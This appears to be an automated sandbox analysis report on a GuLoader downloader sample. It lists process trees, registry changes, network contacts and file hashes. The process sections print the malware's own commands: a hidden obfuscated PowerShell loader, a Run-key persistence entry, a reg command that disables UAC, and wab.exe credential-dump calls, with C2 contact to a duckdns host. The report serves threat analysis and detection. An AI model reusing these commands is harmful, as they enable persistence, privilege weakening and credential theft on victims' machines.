Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-nh8ppstcjb
Target MalwareBazaar.19
SHA256 f626d873512895ed8be4ead8d18d4db04bdb19a74a83d44759a45257582a75cd
Tags
guloader downloader execution persistence collection evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f626d873512895ed8be4ead8d18d4db04bdb19a74a83d44759a45257582a75cd

Threat Level: Known bad

The file MalwareBazaar.19 was found to be: Known bad.

Malicious Activity Summary

guloader downloader execution persistence collection evasion trojan

Guloader,Cloudeye

UAC bypass

NirSoft MailPassView

NirSoft WebBrowserPassView

Nirsoft

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Adds Run key to start application

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

NSIS installer

Suspicious use of SetWindowsHookEx

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 11:24

Signatures

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 11:24

Reported

2024-07-09 11:27

Platform

win7-20240704-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"

Signatures

Guloader,Cloudeye

downloader guloader

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\Offervilliges = "%Quaternary% -windowstyle minimized $Funktionslederes=(Get-ItemProperty -Path 'HKCU:\\Tilstransportlvr\\').Directoryet;%Quaternary% ($Funktionslederes)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1580 set thread context of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2248 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2248 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2248 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1580 wrote to memory of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1580 wrote to memory of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1580 wrote to memory of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1580 wrote to memory of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1580 wrote to memory of 2060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2060 wrote to memory of 2720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2720 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2720 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2720 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe

"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Chemosensitivity=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Rhagadiform199.Udl';$saalbnkes=$Chemosensitivity.SubString(72809,3);.$saalbnkes($Chemosensitivity)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Offervilliges" /t REG_EXPAND_SZ /d "%Quaternary% -windowstyle minimized $Funktionslederes=(Get-ItemProperty -Path 'HKCU:\Tilstransportlvr\').Directoryet;%Quaternary% ($Funktionslederes)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Offervilliges" /t REG_EXPAND_SZ /d "%Quaternary% -windowstyle minimized $Funktionslederes=(Get-ItemProperty -Path 'HKCU:\Tilstransportlvr\').Directoryet;%Quaternary% ($Funktionslederes)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp

Files

memory/1580-11-0x0000000074401000-0x0000000074402000-memory.dmp

memory/1580-12-0x0000000074400000-0x00000000749AB000-memory.dmp

memory/1580-14-0x0000000074400000-0x00000000749AB000-memory.dmp

memory/1580-13-0x0000000074400000-0x00000000749AB000-memory.dmp

memory/1580-15-0x0000000074400000-0x00000000749AB000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Rhagadiform199.Udl

MD5 fc2223e92e3b7eb6b306e7489bc9ea76
SHA1 a886646121c2d0882b0f69cff28277fea465a431
SHA256 86fab35b54a947d4aba1fe2915a69748b51a8ee9cf9791678dcecda609d427af
SHA512 98ca788deef3630dbae7146d5377c44cd57a1bda8277a25170a033017f4a8b414e272d6d97e94139e306fed1e28e294a1e08d09d90fa49dc675ba5c9dda7e55e

memory/1580-18-0x0000000074400000-0x00000000749AB000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Terzio.Pre27

MD5 bd2cb39300237694661fcb0686d7aeec
SHA1 c912db66db40e04a9436c248d8ee19eaa4e2c5c7
SHA256 33deda6aca491470e132ec1feead0d380bd35b792f886a1cd1f1ce29e9b5b21e
SHA512 49ecdaa68f3d1502d947faae83da3e24cf2459c6a2576a07dcb14ab0ddc14c76b9d4874d823463e1c4ee4453764cf9c2f2930c3b4ca1513294c003bb8cf21d89

memory/1580-20-0x0000000074400000-0x00000000749AB000-memory.dmp

memory/1580-21-0x0000000006820000-0x000000000A8E2000-memory.dmp

memory/1580-22-0x0000000074400000-0x00000000749AB000-memory.dmp

memory/2060-43-0x0000000001AB0000-0x0000000005B72000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 11:24

Reported

2024-07-09 11:27

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Offervilliges = "%Quaternary% -windowstyle minimized $Funktionslederes=(Get-ItemProperty -Path 'HKCU:\\Tilstransportlvr\\').Directoryet;%Quaternary% ($Funktionslederes)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 948 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4392 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4392 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4392 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4392 wrote to memory of 3516 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 2248 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2248 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2248 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2248 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2248 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1456 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1456 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1180 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1180 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1180 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1180 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1016 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1016 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1016 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3516 wrote to memory of 1016 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe

"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Chemosensitivity=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Rhagadiform199.Udl';$saalbnkes=$Chemosensitivity.SubString(72809,3);.$saalbnkes($Chemosensitivity)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Offervilliges" /t REG_EXPAND_SZ /d "%Quaternary% -windowstyle minimized $Funktionslederes=(Get-ItemProperty -Path 'HKCU:\Tilstransportlvr\').Directoryet;%Quaternary% ($Funktionslederes)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Offervilliges" /t REG_EXPAND_SZ /d "%Quaternary% -windowstyle minimized $Funktionslederes=(Get-ItemProperty -Path 'HKCU:\Tilstransportlvr\').Directoryet;%Quaternary% ($Funktionslederes)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\idgiecvpdnej"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lxlafvgjrvwojhd"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vzrlxfylfdotlvrqtq"

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 a458386d9.duckdns.org udp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 73.50.76.217.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4392-9-0x0000000073E4E000-0x0000000073E4F000-memory.dmp

memory/4392-10-0x0000000003330000-0x0000000003366000-memory.dmp

memory/4392-11-0x0000000005B60000-0x0000000006188000-memory.dmp

memory/4392-12-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-13-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-14-0x0000000005A30000-0x0000000005A52000-memory.dmp

memory/4392-15-0x0000000006200000-0x0000000006266000-memory.dmp

memory/4392-16-0x00000000062E0000-0x0000000006346000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qadkf1kl.1dm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4392-26-0x0000000006350000-0x00000000066A4000-memory.dmp

memory/4392-27-0x0000000006900000-0x000000000691E000-memory.dmp

memory/4392-28-0x00000000069A0000-0x00000000069EC000-memory.dmp

memory/4392-29-0x0000000006E60000-0x0000000006EF6000-memory.dmp

memory/4392-30-0x0000000006E10000-0x0000000006E2A000-memory.dmp

memory/4392-31-0x0000000007AF0000-0x0000000007B12000-memory.dmp

memory/4392-32-0x00000000080D0000-0x0000000008674000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Rhagadiform199.Udl

MD5 fc2223e92e3b7eb6b306e7489bc9ea76
SHA1 a886646121c2d0882b0f69cff28277fea465a431
SHA256 86fab35b54a947d4aba1fe2915a69748b51a8ee9cf9791678dcecda609d427af
SHA512 98ca788deef3630dbae7146d5377c44cd57a1bda8277a25170a033017f4a8b414e272d6d97e94139e306fed1e28e294a1e08d09d90fa49dc675ba5c9dda7e55e

memory/4392-34-0x0000000008D00000-0x000000000937A000-memory.dmp

memory/4392-36-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-37-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-38-0x0000000073E40000-0x00000000745F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Terzio.Pre27

MD5 bd2cb39300237694661fcb0686d7aeec
SHA1 c912db66db40e04a9436c248d8ee19eaa4e2c5c7
SHA256 33deda6aca491470e132ec1feead0d380bd35b792f886a1cd1f1ce29e9b5b21e
SHA512 49ecdaa68f3d1502d947faae83da3e24cf2459c6a2576a07dcb14ab0ddc14c76b9d4874d823463e1c4ee4453764cf9c2f2930c3b4ca1513294c003bb8cf21d89

memory/4392-40-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-41-0x0000000009380000-0x000000000D442000-memory.dmp

memory/4392-42-0x0000000073E4E000-0x0000000073E4F000-memory.dmp

memory/4392-43-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-44-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-46-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/4392-47-0x0000000073E40000-0x00000000745F0000-memory.dmp

memory/3516-49-0x0000000077918000-0x0000000077919000-memory.dmp

memory/3516-48-0x0000000077891000-0x00000000779B1000-memory.dmp

memory/3516-62-0x0000000001970000-0x0000000005A32000-memory.dmp

memory/1180-65-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1180-67-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1180-70-0x0000000000400000-0x0000000000462000-memory.dmp

memory/764-72-0x0000000000400000-0x0000000000478000-memory.dmp

memory/764-71-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1016-69-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1016-68-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1016-66-0x0000000000400000-0x0000000000424000-memory.dmp

memory/764-64-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\idgiecvpdnej

MD5 bd1b326cef85cdd2c476b77c3ef90b46
SHA1 c402aaa0b62e294ffa1f4645dbb5798b6891d3bd
SHA256 a09dbd894f070dfbdaeec662950cbe91de844d4249fe490cfa3b3f5992060ce3
SHA512 62da53fd57b7c053fe9cedd3bc603465a4879aac07d2da118f52a88423865edb9dddeba9650fcf79a26e6db83f5cbb92e49df6a41c4df466c671e485372e0cd7

memory/3516-78-0x0000000021A90000-0x0000000021AA9000-memory.dmp

memory/3516-82-0x0000000021A90000-0x0000000021AA9000-memory.dmp

memory/3516-81-0x0000000021A90000-0x0000000021AA9000-memory.dmp

memory/3516-86-0x0000000077891000-0x00000000779B1000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 df9af598540cc1e81d51db156a66ddc9
SHA1 c3f0c3f9dc69f5b30c6b0d7b53f6a171aa49ec7f
SHA256 279f0d7df6d5ffc8b2d9b515de36c7fc5f36708288205a2143e22829b4a9f0d1
SHA512 dd6358c6eaf18ac981f94eacee0fe6bd9670bc80e3bee7209bf3c442eb488ce17bdf104830151806c4d7f70c720198c7ae702536d78e05de3d3107a5fade7e11